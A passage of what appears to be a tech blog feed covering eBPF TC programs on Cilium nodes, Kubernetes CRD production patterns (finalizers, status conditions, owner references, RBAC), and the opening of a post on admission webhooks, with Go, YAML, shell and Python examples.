Veth direction confusion: TC ingress/egress is named from the kernel's perspective of the interface, not the pod's. The host-side veth receives the traffic the pod sends, so TC ingress on the host veth is the pod's outbound traffic, and cil_from_container, attached there, enforces the pod's egress policy. This trips up everyone the first time. When debugging, always check tc filter show dev lxcXXX ingress and egress separately, and confirm which Cilium program is attached (cil_from_container = pod outbound, cil_to_container = pod inbound).

To see the full picture on a node:

# All eBPF network programs (XDP and TC) across all interfaces
bpftool net list

# TC-specific view
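# ip prints veth names as "lxcXXXX@ifN"; strip the "@ifN" suffix, which tc does not accept
for iface in $(ip -o link show | awk -F': ' '/lxc/ {sub(/@.*/, "", $2); print $2}'); do
    echo "=== $iface ==="
    tc filter show dev "$iface" ingress
    tc filter show dev "$iface" egress
done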

TC Can Modify Packets Too

TC programs work on the full sk_buff and can modify packet content: headers, payload, and checksums. (XDP can rewrite packet bytes too, but without sk_buff metadata or the skb helpers.) This is how TC-based DNAT works in Cilium when XDP isn't available on the NIC: the program rewrites the destination IP at L3 with bpf_skb_store_bytes and fixes up the IP and transport checksums with helpers such as bpf_l3_csum_replace and bpf_l4_csum_replace, so it never recomputes them by hand.

From an operational standpoint: if you see a TC program attached but expected traffic is being redirected rather than dropped, the program is likely doing DNAT. bpftool prog dump xlated id <ID> shows the disassembled instructions and will reveal bpf_skb_store_bytes calls if packet rewriting is happening.
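
The checksum fix-up that accompanies a DNAT rewrite is an incremental update: only the changed words are folded into the existing checksum. The sketch below works through that arithmetic in userspace using RFC 1624 (equation 3) and compares it with a full recomputation. The addresses and header values are made up, and this illustrates the math only, not Cilium's or the kernel's actual code.

```python
import ipaddress
import struct


def fold(total: int) -> int:
    """Fold carries back in (one's-complement addition) until 16 bits remain."""
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def full_checksum(header: bytes) -> int:
    """Checksum over a header whose checksum field is zeroed."""
    words = struct.unpack(f"!{len(header) // 2}H", header)
    return ~fold(sum(words)) & 0xFFFF


def incremental_checksum(old_csum: int, old_field: bytes, new_field: bytes) -> int:
    """RFC 1624 eqn. 3: HC' = ~(~HC + ~m + m'), applied per 16-bit word."""
    total = ~old_csum & 0xFFFF
    old_words = struct.unpack(f"!{len(old_field) // 2}H", old_field)
    new_words = struct.unpack(f"!{len(new_field) // 2}H", new_field)
    for old, new in zip(old_words, new_words):
        total += (~old & 0xFFFF) + new
    return ~fold(total) & 0xFFFF


def build_header(src: str, dst: str) -> bytes:
    """20-byte IPv4 header (TCP, TTL 64) with the checksum field left at zero."""
    return struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 40, 0x1234, 0, 64, 6, 0,
        ipaddress.IPv4Address(src).packed,
        ipaddress.IPv4Address(dst).packed,
    )


# Hypothetical DNAT: service VIP 10.96.0.10 rewritten to backend 10.0.2.7.
SRC, VIP, BACKEND = "10.0.1.5", "10.96.0.10", "10.0.2.7"
before = full_checksum(build_header(SRC, VIP))
patched = incremental_checksum(
    before,
    ipaddress.IPv4Address(VIP).packed,
    ipaddress.IPv4Address(BACKEND).packed,
)
recomputed = full_checksum(build_header(SRC, BACKEND))
print(hex(patched), hex(recomputed))
```

The two values agree, which is the point of the incremental form: the cost depends on the size of the rewritten field, not on the size of the header or payload.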

Debugging TC Programs in Production

Workflow I follow when investigating network issues on Cilium clusters:

# 1. List all eBPF network programs (see the full picture)
bpftool net list

# 2. Check specific interface for stale TC filters
tc filter show dev lxcABCDEF ingress
tc filter show dev lxcABCDEF egress

# 3. Inspect a specific program
bpftool prog show id 44

# 4. Disassemble a program (last resort for understanding behavior)
bpftool prog dump xlated id 44

# 5. Check Cilium's view of the same interface
cilium endpoint list
cilium endpoint get <endpoint-id>

# 6. Enable verbose TC program logs (debug builds only)
# Cilium: set CILIUM_DEBUG=true in the deployment

Common Mistakes

| Mistake | Impact | Fix |
| --- | --- | --- |
| Not checking for stale TC filters after Cilium upgrades | Conflicting policy programs cause intermittent drops | Run tc filter show post-upgrade; remove stale by priority |
| Confusing ingress/egress direction on veth interfaces | Policy applied to wrong traffic direction | TC ingress on host-side veth = pod's outbound traffic |
| Attaching TC without clsact qdisc | Filter attachment fails | tc qdisc add dev <iface> clsact before filter add |
| Returning TC_ACT_UNSPEC or TC_ACT_PIPE when you want to stop the chain | Subsequent filters still run | Return a final verdict (TC_ACT_OK, TC_ACT_SHOT, or TC_ACT_REDIRECT) to end classification |
| Expecting TC performance equal to XDP | TC has sk_buff overhead, so it is slower | Right tool: XDP for pre-stack bulk drops, TC for identity-aware policy |
| Hardcoding skb->mark interpretation | Different tools use mark differently | Document mark field usage clearly; coordinate between Cilium and custom programs |

Key Takeaways

  • TC eBPF fires after sk_buff allocation — it has socket metadata, cgroup ID, and pod identity that XDP lacks
  • Direct action (DA) mode combines filter and action; the program’s return value is the packet fate
  • Multiple TC programs chain on the same hook ordered by priority — stale programs from Cilium upgrades cause silent policy conflicts
  • tc filter show dev <iface> ingress/egress is the primary inspection tool; bpftool net list shows the full node picture
  • XDP + TC is the Cilium data path: XDP for pre-stack service load balancing, TC for per-pod identity-based enforcement
  • TC can modify packet content (bpf_skb_store_bytes) — the basis for TC-based DNAT and packet mangling

What’s Next

EP08 closes out the kernel machinery arc: program types, maps, CO-RE, XDP, TC. Five episodes on the engine under the tools. EP09 shifts from understanding the machinery to using it interactively.

bpftrace turns kernel knowledge into one-liners you can run on a live production node. Which process is touching this file right now? Where is this latency spike originating in the kernel call stack? Which container is making DNS queries to an unexpected resolver? Under 10 seconds per question — no restart, no sidecar, no instrumentation change.

Every bpftrace one-liner is a complete eBPF program compiled, loaded, run, and cleaned up on the fly. EP09 covers how that works and why it changes the way you investigate production incidents.

Next: bpftrace — kernel answers in one line


Kubernetes CRDs in Production: Finalizers, Status Conditions, and RBAC Patterns

Reading Time: 8 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 10
What Is a CRD? · CRDs You Already Use · CRD Anatomy · Write Your First CRD · CEL Validation · Controller Loop · Build an Operator · CRD Versioning · Admission Webhooks · CRDs in Production


TL;DR

  • Finalizers block deletion until cleanup completes — they prevent orphaned external resources but cause stuck objects if the controller crashes mid-cleanup; always implement a removal timeout
  • Status conditions are the standard communication channel between controller and user: use type, status, reason, message, and observedGeneration on every condition; never invent ad-hoc status fields
  • Owner references wire automatic garbage collection — when the parent custom resource is deleted, Kubernetes deletes owned child objects; use them for every object your controller creates in the same namespace
  • RBAC for CRDs in multi-tenant clusters must include separate ClusterRoles for controller, editor, and viewer; grant status and finalizers as separate sub-resources; never give application teams cluster-scoped create/delete on CRDs
  • The three most common Kubernetes CRD production failure modes: finalizer death loop, status thrash, and CRD deletion cascade — all avoidable with the patterns in this episode
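  • Every CRD on a healthy cluster should report the Established condition as True; kubectl get crds does not print it, so check status.conditions (kubectl get crd <name> -o yaml) or run kubectl wait --for=condition=Established crd/<name>. The API server does not serve a CRD that is not Established, so requests for its resources fail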

The Big Picture

  PRODUCTION CRD LIFECYCLE: FULL PICTURE

  Create         Reconcile        Suspend/Resume      Delete
  ──────         ─────────        ──────────────      ──────
  User applies   Controller       User patches         User deletes
  BackupPolicy   creates CronJob, spec.suspended=true  BackupPolicy
      │          sets status          │                    │
      ▼              │                ▼                    ▼
  Admission      │           Controller          Finalizer blocks
  webhook        │           suspends CronJob     deletion
  (if any)       │                               Controller:
      │          │                                 1. Delete CronJob
      ▼          ▼                                 2. Remove external state
  Schema       Status                              3. Remove finalizer
  validation   conditions                          Object deleted from etcd
      │        updated
      ▼
  Controller
  reconcile
  triggered

Kubernetes CRD production readiness is not just about making the happy path work — it is about designing for the failure modes: controllers crashing mid-operation, deletion races, and status messages that confuse operators at 2am.


Finalizers: Controlled Deletion

A finalizer is a string in metadata.finalizers. Kubernetes will not delete an object that has finalizers, regardless of who issues the delete command.

metadata:
  name: nightly
  namespace: demo
  finalizers:
    - storage.example.com/backup-cleanup  # ← your controller put this here

When kubectl delete bp nightly runs:

  1. API server sets metadata.deletionTimestamp  (does NOT delete yet)
  2. Object is visible as "Terminating"
  3. Controller sees deletionTimestamp set
  4. Controller runs cleanup:
       - delete backup data from S3
       - delete CronJob (or let owner references handle it)
       - release any external locks
  5. Controller removes the finalizer:
       patch bp nightly --type=json \
         -p '[{"op":"remove","path":"/metadata/finalizers/0"}]'
  6. API server sees finalizers list is now empty → deletes the object
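
The deletion sequence above can be modelled in a few lines to make the ordering concrete. This is a toy in-memory stand-in for the API server, not client code: the class and method names are invented for illustration.

```python
from dataclasses import dataclass, field
from typing import Optional

FINALIZER = "storage.example.com/backup-cleanup"


@dataclass
class Obj:
    name: str
    finalizers: list = field(default_factory=list)
    deletion_timestamp: Optional[float] = None


class ToyApiServer:
    """Mimics only the finalizer-related part of delete handling."""

    def __init__(self):
        self.store = {}

    def create(self, obj: Obj) -> None:
        self.store[obj.name] = obj

    def delete(self, name: str, now: float) -> None:
        obj = self.store[name]
        if obj.finalizers:
            # Steps 1-2: mark for deletion, keep the object ("Terminating").
            if obj.deletion_timestamp is None:
                obj.deletion_timestamp = now
        else:
            del self.store[name]

    def remove_finalizer(self, name: str, finalizer: str) -> None:
        obj = self.store[name]
        obj.finalizers.remove(finalizer)
        # Step 6: an object marked for deletion goes away once the list is empty.
        if obj.deletion_timestamp is not None and not obj.finalizers:
            del self.store[name]


api = ToyApiServer()
api.create(Obj("nightly", finalizers=[FINALIZER]))

api.delete("nightly", now=100.0)
terminating = "nightly" in api.store and api.store["nightly"].deletion_timestamp == 100.0

api.delete("nightly", now=200.0)  # repeating (or forcing) the delete changes nothing
still_there = "nightly" in api.store

api.remove_finalizer("nightly", FINALIZER)  # step 5, done by the controller
gone = "nightly" not in api.store
```

The second delete call is the interesting one: nothing a user does to the delete request matters until the finalizer list is empty.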

Adding a finalizer in Go

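import (
    "context"

    ctrl "sigs.k8s.io/controller-runtime"
    "sigs.k8s.io/controller-runtime/pkg/client"
    "sigs.k8s.io/controller-runtime/pkg/controller/controllerutil"

    // Placeholder path: point this at the API package in your own module.
    storagev1alpha1 "example.com/backup-operator/api/v1alpha1"
)

const finalizerName = "storage.example.com/backup-cleanup"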

func (r *BackupPolicyReconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
    bp := &storagev1alpha1.BackupPolicy{}
    if err := r.Get(ctx, req.NamespacedName, bp); err != nil {
        return ctrl.Result{}, client.IgnoreNotFound(err)
    }

    // Deletion path
    if !bp.DeletionTimestamp.IsZero() {
        if controllerutil.ContainsFinalizer(bp, finalizerName) {
            if err := r.cleanupExternalResources(ctx, bp); err != nil {
                return ctrl.Result{}, err
            }
            controllerutil.RemoveFinalizer(bp, finalizerName)
            if err := r.Update(ctx, bp); err != nil {
                return ctrl.Result{}, err
            }
        }
        return ctrl.Result{}, nil
    }

    // Normal path: ensure finalizer is present
    if !controllerutil.ContainsFinalizer(bp, finalizerName) {
        controllerutil.AddFinalizer(bp, finalizerName)
        if err := r.Update(ctx, bp); err != nil {
            return ctrl.Result{}, err
        }
    }

    // ... rest of reconcile

    return ctrl.Result{}, nil
}

Finalizer death loop and the timeout pattern

If cleanupExternalResources always returns an error (external system down, bug in cleanup code), the object gets stuck in Terminating forever. The operator cannot delete it; kubectl delete --force does not help with finalizers.

Prevention: add a cleanup deadline with status tracking.

func (r *BackupPolicyReconciler) cleanupExternalResources(ctx context.Context, bp *storagev1alpha1.BackupPolicy) error {
    // Check if we've been trying to clean up for too long
    if bp.DeletionTimestamp != nil {
        deadline := bp.DeletionTimestamp.Add(10 * time.Minute)
        if time.Now().After(deadline) {
            // Log the failure, abandon cleanup, let the object be deleted.
            log.FromContext(ctx).Error(nil, "cleanup deadline exceeded, removing finalizer anyway",
                "name", bp.Name)
            return nil // nil lets Reconcile go ahead and remove the finalizer
        }
    }
    // ... actual cleanup
    return nil
}

Recovery for a stuck object (use only when cleanup truly cannot succeed):

kubectl patch bp nightly -n demo --type=json \
  -p '[{"op":"remove","path":"/metadata/finalizers"}]'

Status Conditions: The Right Way

The Kubernetes standard condition format is defined in k8s.io/apimachinery/pkg/apis/meta/v1.Condition:

type Condition struct {
    Type               string          // e.g. "Ready", "Synced", "Degraded"
    Status             ConditionStatus // "True", "False", "Unknown"
    ObservedGeneration int64           // the .metadata.generation this condition reflects
    LastTransitionTime metav1.Time     // when Status last changed
    Reason             string          // machine-readable, CamelCase, e.g. "CronJobCreated"
    Message            string          // human-readable, may contain details
}

Standard condition types

Type         Meaning
Ready        The resource is fully reconciled and operational
Synced       The resource has been synced with an external system
Progressing  An operation is actively in progress
Degraded     The resource is operating in a reduced capacity

Use Ready: True only when the full reconcile is complete and the resource is functional. Use Ready: False with a clear Message when reconcile fails or is blocked.

Setting conditions in Go

meta.SetStatusCondition(&bpCopy.Status.Conditions, metav1.Condition{
    Type:               "Ready",
    Status:             metav1.ConditionFalse,
    ObservedGeneration: bp.Generation,
    Reason:             "CronJobCreateFailed",
    Message:            fmt.Sprintf("failed to create CronJob: %v", err),
})

meta.SetStatusCondition handles deduplication — it updates an existing condition of the same Type rather than appending a duplicate.

observedGeneration is critical

metadata.generation      = 5   (increments on every spec change)
status.observedGeneration = 3  (set by controller on each reconcile)

If observedGeneration < generation:
  → controller has not yet reconciled the latest spec change
  → status.conditions reflect an older state
  → do NOT alert based on conditions that lag generation

Always set ObservedGeneration: bp.Generation when writing status conditions. Tooling (Argo CD, Flux, kubectl wait) depends on this to know whether status is current.
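The lag rule above can be expressed as a small predicate. This is a sketch under simple assumptions: statusIsCurrent and shouldAlertNotReady are hypothetical names, and the Ready status is passed as a plain string rather than read from a real object.

```go
package main

import "fmt"

// statusIsCurrent reports whether the controller has observed the latest spec.
func statusIsCurrent(generation, observedGeneration int64) bool {
	return observedGeneration >= generation
}

// shouldAlertNotReady fires only when Ready is False AND the condition
// reflects the latest generation. A lagging condition is ignored because it
// describes an older spec.
func shouldAlertNotReady(generation, observedGeneration int64, readyStatus string) bool {
	return statusIsCurrent(generation, observedGeneration) && readyStatus == "False"
}

func main() {
	// generation 5, observed 3: status is stale, so do not alert yet.
	fmt.Println(shouldAlertNotReady(5, 3, "False"))
	// generation 5, observed 5: status is current and not ready, so alert.
	fmt.Println(shouldAlertNotReady(5, 5, "False"))
}
```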

kubectl wait uses conditions

# Wait until BackupPolicy is Ready
kubectl wait bp/nightly -n demo \
  --for=condition=Ready \
  --timeout=60s

This works because kubectl wait reads the status.conditions array.


Owner References: Automatic Garbage Collection

Owner references wire a parent-child relationship between Kubernetes objects. When the parent is deleted, Kubernetes garbage-collects all owned children automatically.

metadata:
  name: nightly-backup       # CronJob
  ownerReferences:
    - apiVersion: storage.example.com/v1alpha1
      kind: BackupPolicy
      name: nightly
      uid: a1b2c3d4-...
      controller: true          # only one owner can be the controller
      blockOwnerDeletion: true  # with foreground deletion, the owner is not removed until this child is gone

Set in Go using ctrl.SetControllerReference:

if err := ctrl.SetControllerReference(bp, cronJob, r.Scheme); err != nil {
    return ctrl.Result{}, err
}

Owner reference rules

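  • A namespaced owner must be in the same namespace as the objects it owns. Cluster-scoped objects can own namespaced objects, but a namespaced object cannot own a cluster-scoped object or an object in another namespace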
  • Only one object can be the controller: true owner; others can be non-controller owners
  • Deleting the owner cascades to deleting owned objects — this is garbage collection, not finalizer-based cleanup

Without owner references, deleting a BackupPolicy leaves the CronJob as an orphan. This is hard to detect and accumulates over time.
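As a rough mental model of what cascading deletion reaches, the sketch below walks ownership links from a parent UID. It is a simplification, not how the garbage collector is implemented: Object and dependentsOf are hypothetical, each object is assumed to have at most one owner, and the UIDs are made up.

```go
package main

import (
	"fmt"
	"sort"
)

// Object is a simplified stand-in for a Kubernetes object.
// Assumption: at most one owner per object, identified by UID.
type Object struct {
	Name     string
	UID      string
	OwnerUID string // empty means no owner
}

// dependentsOf returns the names of every object owned, directly or
// transitively, by ownerUID. These are the objects a cascade would remove.
func dependentsOf(ownerUID string, objects []Object) []string {
	var names []string
	seen := map[string]bool{ownerUID: true}
	queue := []string{ownerUID}
	for len(queue) > 0 {
		current := queue[0]
		queue = queue[1:]
		for _, o := range objects {
			if o.OwnerUID == current && !seen[o.UID] {
				seen[o.UID] = true
				names = append(names, o.Name)
				queue = append(queue, o.UID)
			}
		}
	}
	sort.Strings(names)
	return names
}

func main() {
	objects := []Object{
		{Name: "nightly", UID: "uid-bp"},                                  // BackupPolicy
		{Name: "nightly-backup", UID: "uid-cj", OwnerUID: "uid-bp"},       // CronJob owned by the policy
		{Name: "nightly-backup-001", UID: "uid-job", OwnerUID: "uid-cj"},  // Job owned by the CronJob
		{Name: "legacy-backup", UID: "uid-old"},                           // CronJob with no owner reference
	}
	fmt.Println(dependentsOf("uid-bp", objects))
}
```

The CronJob without an owner reference never appears in the result, which is exactly the orphan case described above.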


RBAC Patterns for Multi-Tenant CRD Usage

A production CRD deployment needs three distinct RBAC roles:

# 1. Controller role — full access for the operator
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: backuppolicy-controller
rules:
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies"]
    verbs: ["get", "list", "watch", "update", "patch"]
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies/status"]
    verbs: ["get", "update", "patch"]
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies/finalizers"]
    verbs: ["update"]
  - apiGroups: ["batch"]
    resources: ["cronjobs"]
    verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
---
# 2. Editor role — for application teams (namespaced binding)
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: backuppolicy-editor
rules:
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies"]
    verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
  # No status write — only the controller writes status
  # No finalizers write — prevents deletion blocking by non-controllers
---
# 3. Viewer role — for audit, monitoring
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: backuppolicy-viewer
rules:
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies"]
    verbs: ["get", "list", "watch"]

Bind editor/viewer roles at namespace scope, not cluster scope:

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: team-alpha-backup-editor
  namespace: team-alpha
subjects:
  - kind: Group
    name: team-alpha
    apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: backuppolicy-editor
  apiGroup: rbac.authorization.k8s.io

This pattern gives team-alpha full control over BackupPolicies in their namespace but no access to other namespaces — standard Kubernetes multi-tenancy.


The Three Production Failure Modes

1. Finalizer death loop

Symptoms: Object stuck in Terminating for hours; kubectl get bp nightly -o yaml shows metadata.deletionTimestamp set, but the object still exists.

Cause: cleanupExternalResources always returns an error.

Detection:

kubectl get bp nightly -n demo -o jsonpath='{.metadata.deletionTimestamp}'
# non-empty = stuck in termination
kubectl describe bp nightly -n demo
# look for repeated reconcile error events

Fix: Add cleanup deadline in controller; use kubectl patch to remove finalizer as last resort.

2. Status thrash

Symptoms: Controller sets Ready: True, then Ready: False, then Ready: True in a rapid loop. Alert noise, confusing dashboards.

Cause: Each reconcile compares actual state incorrectly due to cache lag — it sees its own status write as a change, re-reconciles, and flips the status again.

Fix: Set ObservedGeneration on every condition. Compare generation with observedGeneration before re-reconciling. Use meta.FindStatusCondition to read the current condition, and skip the status write when nothing has changed.

// Only update status if it changed
current := meta.FindStatusCondition(bp.Status.Conditions, "Ready")
if current == nil || current.Status != desired.Status || current.Reason != desired.Reason {
    meta.SetStatusCondition(&bpCopy.Status.Conditions, desired)
    if err := r.Status().Update(ctx, bpCopy); err != nil {
        return ctrl.Result{}, err
    }
}

3. CRD deletion cascade

Symptoms: A team deletes a CRD for cleanup purposes; all instances across all namespaces disappear silently.

Cause: kubectl delete crd backuppolicies.storage.example.com — the API server cascades the deletion to all custom resources of that type.

Prevention:
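– Kubernetes has no built-in deletion lock for CRDs, so restrict the delete verb on customresourcedefinitions with RBAC; for Helm-installed CRDs, the helm.sh/resource-policy: keep annotation stops Helm from deleting them on uninstall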
– Use GitOps (Argo CD, Flux) to manage CRD installation — a deleted CRD is automatically re-applied from the Git source
– Back up CRDs and instances with velero or equivalent before any CRD management operations


Production Readiness Checklist

CRD DEFINITION
  □ spec.versions has exactly one storage: true version
  □ Status subresource enabled (subresources.status: {})
  □ additionalPrinterColumns includes Ready column from status.conditions
  □ OpenAPI schema defines required fields and types
  □ CEL rules cover cross-field constraints

CONTROLLER
  □ Owner references set on all child resources
  □ Finalizer logic includes cleanup deadline
  □ Status conditions use standard format with observedGeneration
  □ Reconcile function is idempotent
  □ Not-found errors handled cleanly (return nil, not error)
  □ At least 2 replicas with leader election enabled

RBAC
  □ Three ClusterRoles: controller, editor, viewer
  □ Status and finalizers are separate RBAC sub-resources
  □ Editor/viewer bound at namespace scope, not cluster scope
  □ Controller ServiceAccount has only necessary permissions

OPERATIONS
  □ CRD installed via GitOps or Helm (not manual kubectl apply)
  □ Backup of CRDs and instances included in cluster backup
  □ kubectl get crds shows Established: True for all CRDs
  □ Monitoring for stuck Terminating objects (finalizer deadlock)
  □ Alert on controller reconcile error rate, not just pod health

⚠ Common Mistakes

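Granting update on backuppolicies but not backuppolicies/status to the controller. With the status subresource enabled, status is written through a separate endpoint. Without permission on backuppolicies/status, r.Status().Update() calls are rejected as Forbidden, and status changes sent through the main resource are dropped without an error. The controller appears to run but status conditions never update. Grant both backuppolicies (for spec/metadata writes) and backuppolicies/status (for the status subresource path).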

Setting Ready: True before all owned resources are healthy. If the controller sets Ready: True after creating the CronJob but before verifying the CronJob is actually active, users see a false-positive health signal. Only set Ready: True when you have confirmed the desired state is actually achieved.

Not setting observedGeneration on status conditions. Tools like Argo CD and kubectl wait --for=condition=Ready will report incorrect health status if observedGeneration is stale. Always set ObservedGeneration: obj.Generation in every condition write.

Using kubectl delete crd in a production cluster without a backup. This is irreversible. Treat CRDs as production-critical infrastructure — require GitOps review, backup verification, and team approval before any CRD deletion.


Quick Reference

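# Check for stuck Terminating objects (requires jq; by default, field selectors
# on custom resources support only metadata.name and metadata.namespace)
kubectl get backuppolicies -A -o json \
  | jq -r '.items[] | select(.metadata.deletionTimestamp != null) | "\(.metadata.namespace)/\(.metadata.name)"'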

# Force-remove a stuck finalizer (use only when cleanup is truly impossible)
kubectl patch bp nightly -n demo --type=json \
  -p '[{"op":"remove","path":"/metadata/finalizers/0"}]'

# Check all CRDs are Established
kubectl get crds -o jsonpath='{range .items[*]}{.metadata.name} {.status.conditions[?(@.type=="Established")].status}{"\n"}{end}'

# Watch status conditions update during reconcile
kubectl get bp nightly -n demo -w -o \
  jsonpath='{.status.conditions[?(@.type=="Ready")].status} {.status.conditions[?(@.type=="Ready")].message}{"\n"}'

# Verify owner references are set on child CronJob
kubectl get cronjob nightly-backup -n demo \
  -o jsonpath='{.metadata.ownerReferences}'

# List all objects owned by a BackupPolicy (by label)
kubectl get all -n demo -l backuppolicy=nightly

Key Takeaways

  • Finalizers block deletion until cleanup completes — always implement a cleanup deadline to prevent permanent stuck objects
  • Status conditions must use the standard format with observedGeneration — tooling depends on it for correctness
  • Owner references enable automatic garbage collection of child resources when the parent is deleted
  • RBAC needs three roles (controller, editor, viewer) with status and finalizers as separate sub-resources
  • The three production failure modes — finalizer death loop, status thrash, CRD deletion cascade — are all preventable with the patterns covered in this episode

Series Complete

You now have the full picture of Kubernetes CRDs and Operators: from understanding what a CRD is (EP01), through real examples (EP02), schema design (EP03), hands-on YAML (EP04), CEL validation (EP05), the controller loop (EP06), building an operator (EP07), versioning (EP08), admission webhooks (EP09), to production patterns in this episode.

The next series in the Kubernetes learning arc on linuxcent.com covers Kubernetes Networking Deep Dive — Services, Ingress, Gateway API, CNI, and eBPF networking. Subscribe below to get it when it launches.


Admission Webhooks: Validating and Mutating Requests Before They Reach etcd

Reading Time: 6 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 9
What Is a CRD? · CRDs You Already Use · CRD Anatomy · Write Your First CRD · CEL Validation · Controller Loop · Build an Operator · CRD Versioning · Admission Webhooks · CRDs in Production


TL;DR

  • Kubernetes admission webhooks are HTTPS endpoints called by the API server synchronously on every create/update/delete — before the object reaches etcd
    (two types: mutating webhooks modify the object; validating webhooks approve or reject it — mutating runs first, then validating)
  • Use a validating webhook when you need to reject objects based on state you cannot express in CEL: checking if a referenced Secret exists, enforcing cross-resource quotas, consulting an external policy engine
  • Use a mutating webhook when you need to inject defaults or sidecar containers that depend on context you cannot express in the CRD schema (environment-specific defaults, sidecar injection)
  • Admission webhooks are an availability dependency — if your webhook is unreachable, the API requests it covers will fail. failurePolicy: Ignore is the safety valve; use it only for non-critical webhooks
  • OPA/Gatekeeper and Kyverno are admission webhook platforms — they let you write policy as code (Rego, YAML) instead of writing Go webhook handlers
  • For CRD-specific validation that only depends on the object itself, prefer CEL (EP05) — webhooks are for rules that require external lookups or cross-resource checks

The Big Picture

  KUBERNETES ADMISSION CHAIN (full picture)

  kubectl apply -f backuppolicy.yaml
        │
        ▼
  API Server: authentication + authorization
        │
        ▼
  1. Mutating admission webhooks
     ┌───────────────────────────────────────┐
     │ Receive object, return modified object │
     │ Examples: inject annotations,          │
     │ set defaults, add sidecars            │
     └───────────────────────────────────────┘
        │
        ▼
  2. Schema validation (OpenAPI + CEL)
        │
        ▼
  3. Validating admission webhooks
     ┌───────────────────────────────────────┐
     │ Receive object, return allow/deny     │
     │ Examples: quota checks, cross-        │
     │ resource validation, policy engines   │
     └───────────────────────────────────────┘
        │
        ▼ (allowed)
  etcd storage

Kubernetes admission webhooks are how tools like Istio inject sidecars, Kyverno enforces policies, and OPA/Gatekeeper applies organizational guardrails — all without modifying Kubernetes source code. Understanding them completes the picture of how Kubernetes is extended beyond CRDs.
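The ordering in the diagram can be modeled as a small pipeline. This is a toy sketch, not API server code: Object, Mutator, Validator, admit, and the three example functions are all hypothetical, and objects are reduced to a flat string map.

```go
package main

import (
	"errors"
	"fmt"
)

// Object is a toy stand-in for a submitted resource.
type Object map[string]string

type Mutator func(Object) Object
type Validator func(Object) error

// admit runs the stages in the order shown in the diagram:
// mutating webhooks, then schema validation, then validating webhooks.
func admit(obj Object, mutators []Mutator, schema Validator, validators []Validator) (Object, error) {
	for _, m := range mutators {
		obj = m(obj)
	}
	if err := schema(obj); err != nil {
		return nil, fmt.Errorf("schema validation: %w", err)
	}
	for _, v := range validators {
		if err := v(obj); err != nil {
			return nil, fmt.Errorf("validating webhook: %w", err)
		}
	}
	return obj, nil // this is the point where the object would be stored
}

// injectCostCenter is an example mutator that adds a field to a copy.
func injectCostCenter(o Object) Object {
	out := Object{}
	for k, v := range o {
		out[k] = v
	}
	out["costCenter"] = "engineering"
	return out
}

// requireSchedule plays the role of schema validation.
func requireSchedule(o Object) error {
	if o["schedule"] == "" {
		return errors.New("schedule is required")
	}
	return nil
}

// requireTeamLabel is an example validating check.
func requireTeamLabel(o Object) error {
	if o["team"] == "" {
		return errors.New("team label is required")
	}
	return nil
}

func main() {
	obj, err := admit(
		Object{"schedule": "0 2 * * *", "team": "alpha"},
		[]Mutator{injectCostCenter}, requireSchedule, []Validator{requireTeamLabel},
	)
	fmt.Println(obj["costCenter"], err)
}
```

Because mutation runs first, validators always see the final, mutated object, which is why a validating webhook can enforce fields that a mutating webhook injects.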


Validating vs Mutating: When to Use Each

  DECISION TREE: CEL vs Validating Webhook vs Mutating Webhook

  "I need to validate a field value"
      │
      ├── Depends only on the object being submitted?
      │   → Use CEL (x-kubernetes-validations) — EP05
      │
      └── Needs to look up another resource, quota, or external system?
          → Use Validating Admission Webhook

  "I need to set default values or inject content"
      │
      ├── Defaults depend only on other fields in the same object?
      │   → Use OpenAPI schema defaults or CEL
      │
      └── Defaults depend on environment, namespace labels, or external config?
          → Use Mutating Admission Webhook

Practical examples:

Rule                                                              Right tool
retentionDays must be ≤ 365                                       CEL
if storageClass=premium then retentionDays ≤ 90                   CEL
Referenced SecretStore must exist in the same namespace           Validating webhook
BackupPolicy count per namespace must not exceed team quota       Validating webhook
Inject costCenter annotation from namespace labels                Mutating webhook
Inject backup-agent sidecar into all Pods in labeled namespaces   Mutating webhook
Enforce that all BackupPolicies have a team label                 Kyverno or OPA policy

The Webhook Request/Response Contract

Both webhook types receive an AdmissionReview object and return an AdmissionReview response.

Request (from API server to webhook):

{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "request": {
    "uid": "705ab4f5-6393-11e8-b7cc-42010a800002",
    "kind": {"group": "storage.example.com", "version": "v1alpha1", "kind": "BackupPolicy"},
    "resource": {"group": "storage.example.com", "version": "v1alpha1", "resource": "backuppolicies"},
    "operation": "CREATE",
    "userInfo": {"username": "alice", "groups": ["system:authenticated"]},
    "object": { /* full BackupPolicy JSON */ },
    "oldObject": null
  }
}

Response for a validating webhook (allow):

{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "response": {
    "uid": "705ab4f5-6393-11e8-b7cc-42010a800002",
    "allowed": true
  }
}

Response for a validating webhook (deny):

{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "response": {
    "uid": "...",
    "allowed": false,
    "status": {
      "code": 422,
      "message": "referenced SecretStore 'aws-secrets-manager' not found in namespace 'production'"
    }
  }
}

Response for a mutating webhook (allow + patch):

{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "response": {
    "uid": "...",
    "allowed": true,
    "patchType": "JSONPatch",
    "patch": "W3sib3AiOiJhZGQiLCJwYXRoIjoiL21ldGFkYXRhL2Fubm90YXRpb25zL2Nvc3RDZW50ZXIiLCJ2YWx1ZSI6ImVuZ2luZWVyaW5nIn1d"
    // base64-encoded JSON patch:
    // [{"op":"add","path":"/metadata/annotations/costCenter","value":"engineering"}]
  }
}
